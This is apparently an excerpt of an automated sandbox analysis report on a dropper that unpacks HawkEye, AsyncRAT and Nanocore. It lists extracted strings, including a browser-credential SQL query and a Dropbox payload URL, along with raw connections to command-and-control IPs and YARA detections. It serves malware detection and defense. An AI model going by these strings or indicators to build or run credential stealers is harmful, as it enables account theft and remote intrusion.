                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                    Source: Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: Pluto Panel.exe, 00000005.00000003.434485944.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.434712918.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com&
                    Source: Pluto Panel.exe, 00000005.00000003.445903668.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com=
                    Source: Pluto Panel.exe, 00000005.00000003.445903668.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comic
                    Source: Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: Pluto Panel.exe, 00000005.00000003.646787103.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.494373371.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.493190429.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.497114575.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
                    Source: Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Pluto Panel.exe, 00000005.00000003.646787103.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deMTq
                    Source: Pluto Panel.exe, 00000005.00000003.494373371.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.493190429.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.497114575.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deR
                    Source: Pluto Panel.exe, 00000005.00000003.646787103.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deg
                    Source: Pluto Panel.exe, 00000005.00000003.494373371.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.493190429.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.497114575.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.derasg
                    Source: Pluto Panel.exe, 00000005.00000003.437773657.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.438069908.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.co
                    Source: Pluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436798009.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: Pluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.439099390.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436798009.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437773657.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.439790741.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.438069908.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnY
                    Source: Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnm
                    Source: Pluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436798009.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
                    Source: Pluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436798009.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437773657.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.W
                    Source: Pluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436798009.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnts
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                    Source: healastounding.exe, healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, healastounding.exe, 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, gay.exe, gay.exe, 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, mediaget.exe, 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, mediaget.exe, 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.dropbox.com/s/p84aaz28t0hepul/Pass.exe?dl=0
                    Source: Pluto Panel.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: Pluto Panel.exe, 00000005.00000002.705753147.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.706003291.00000000036CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddress.com/
                    Source: Pluto Panel.exe, 00000005.00000002.706003291.00000000036CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddress.comx&
                    Source: Pluto Panel.exe, 00000005.00000002.706003291.00000000036CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: Pluto Panel.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: unknownDNS traffic detected: queries for: store-images.s-microsoft.com
                    Source: global trafficHTTP traffic detected: GET /?format=xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 80.87.192.115
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: Pluto Panel.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Yara detected HawkEye Keylogger
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Pluto Panel.exe PID: 4236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPED
                    Yara detected AsyncRAT
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.59c8085.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.3479694.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.0.test.exe.da0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: test.exe PID: 6236, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\test.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Contains functionality to log keystrokes (.Net Source)
                    Source: Pluto Panel.exe.0.dr, Form1.cs.Net Code: HookKeyboard
                    Source: gay.exe.4.dr, kl.cs.Net Code: VKCodeToUnicode
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: Opus.exe, 00000009.00000002.701598795.0000000000EEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: Opus.exe, 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices

                    E-Banking Fraud

                    barindex
                    Yara detected Nanocore RAT
                    Source: Yara matchFile source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara matchFile source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
